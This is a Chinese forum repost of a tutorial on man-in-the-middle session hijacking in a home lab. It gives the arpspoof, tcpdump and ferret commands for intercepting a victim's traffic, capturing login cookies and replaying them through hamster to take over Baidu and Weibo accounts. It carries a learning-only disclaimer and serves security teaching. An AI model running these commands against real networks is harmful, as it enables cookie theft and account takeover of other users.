设为首页收藏本站

安而遇随-随遇而安

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 1966|回复: 0

中间人攻击之劫持登录会话(含视频下载)

[复制链接]

 成长值: 50430

发表于 2014-7-26 12:34 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x
关于中间人攻击

中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。因为FreeBuf几位前辈已经给出了大量的中间人攻击的方法,这里就不再重复了。恰好看到FreeBuf目前没有关于中间人攻击劫持登陆回话的文章,所以就有了下面。
视频下载链接: http://pan.baidu.com/s/1ntI8p4l 密码: 2p9t
注:本文提供的攻击测试方法仅供安全学习教学用途,禁止非法使用
0×00
用到的工具是arpspoof tcpdump ferret hamster。
arpspoof 进行ARP欺骗
tcpdump抓去打到本地的数据包
Ferret用来处理抓下来的数据包的
Hamster跟ferret配合使用,提供一个web服务来让我们交互控制。
0×01
拓扑环境:
攻击机:Kali 192.168.1.120
    1.jpg
受害机:Windows7 192.168.1.100
    2.jpg
网关:192.168.1.1
0×02
    我的几个社区帐号都是登录状态,当然未登录也是可以劫持的
    3.jpg
    4.jpg
   
先看下我在Kali的机器上是未登录的   
    5.jpg 6.jpg
   
0×03
开始arp欺骗
7.jpg
命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
0×04
    捕获数据包
    8.jpg
命令:tcpdump -i eth0 -w cookie.cap
0×05
模拟受害者登录
受害者在受害机器上就随便刷新一下或者登录一下
完毕
下面我们开始重点
0×06
处理抓去的数据包
9.jpg
ferret -r cookie.cap

自动生成了 hamster.txt
11.jpg

0×07
开启hamster服务
      12.jpg
0×08
打开浏览器,使用代理
0×09
打开hamster 浏览器输入http://hamster
    13.jpg
选择目标
    14.jpg
0x0A   
找敏感地址
15.jpg

0x0B
百度劫持成功
    16.jpg
微博劫持成功
    17.jpg
都成功了
    18.jpg

0x0C
我在实验的时候碰见一个问题,就是突然上不到网
下面教大家解决
编辑/etc/NetworkManager/NetworkManager.conf
    19.jpg
vi /etc/NetworkManager/NetworkManager.conf
改成true后保存

    20.jpg
service network-manager restart
重启服务
随遇而安论坛   



来源:网络转载

随遇而安
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表